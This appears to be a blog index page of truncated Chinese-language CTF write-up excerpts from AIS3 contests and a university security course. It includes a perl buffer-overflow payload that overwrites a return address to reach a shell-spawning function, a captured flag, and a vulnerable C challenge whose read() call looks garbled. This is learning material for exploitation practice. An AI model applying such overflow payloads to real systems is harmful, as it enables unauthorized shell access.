AIS3 EOF CTF 初賽
前言 這場比賽是跟台大、交大、台科大三校的計算機安全課程期末考一起辦的 然後任何人都可以報名參加 前十名的隊伍可以進決賽 Pwn 由於我們這隊基本上沒人熟Heap 囧 我也只摸了幾題課程網站的練習題 所以Pwn的解題狀況蠻慘的 Magicheap2這種一堆人解掉的題目,我們就解不出來 ...
前言 這場比賽是跟台大、交大、台科大三校的計算機安全課程期末考一起辦的 然後任何人都可以報名參加 前十名的隊伍可以進決賽 Pwn 由於我們這隊基本上沒人熟Heap 囧 我也只摸了幾題課程網站的練習題 所以Pwn的解題狀況蠻慘的 Magicheap2這種一堆人解掉的題目,我們就解不出來 ...
前言 這堂課是台大、台科大、交大、中央(?聯合的資安課程 今年全上pwn跟reverse,跟前年不太一樣(前年還有教Web、Crypto…等) 這一篇文章主要放這門課作業和練習的Write up,記錄一下解法怕忘記 課程網站:https://csie.ctf.tw [hw0] Pwn 1 0x400566有個callme() 裡頭就是system("/bin/sh") overflow蓋return address跳過去即可get shell padding長度40 1 perl -e 'print "A"x40, "\x66\x05\x40\x00\x00\x00\x00\x00"' 1 FLAG{BuFFer_0V3Rflow_is_too_easy} ...
![](https://i.imgur.com/jEhADhe.png width:70%) 前言 AIS3 workshop是AIS3上課的pwn跟SSRF練習平台。 因為平台好像關惹,我也懶得重搞環境打一次 所以下面解法很多都是憑著印象打出來的,有錯請見諒 lab1...
前言 因為平常沒在打CTF,也很久沒認真碰這塊,所以最後只有31分 QAQ 然後這是我第一次參加AIS3,高手感覺好多,怕 UPDATE: 最後正取惹,我朋友8x、9x名也正取惹,所以要上應該算容易的(? Web 1 這題直接 1 curl https://quiz.ais3.org:42351/ 就看得到Flag了 ...
第一題:BOF easy [ pwn ] 題目 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 #include <stdio.h> void l33t() { puts("Congrat !!Congrat"); system("/bin/sh"); } int main() { char buf[20]; puts("Buffer overerflow is easy"); printf("Read your input :"); fflush(stdout); read(fflush0,buf,100); return 0 ; } 解題思路 l33t()中有system("/bin/sh"),所以目標就是執行l33t() 由code可知buf長度20,但read()讀100個bytes,代表這裡可以buffer overflow 並且這題沒有ASLR,所以用objdump可以找出l33t()的address為0x80484fd 接著,只需要將main()的return address蓋成0x80484fd即可 payload: ...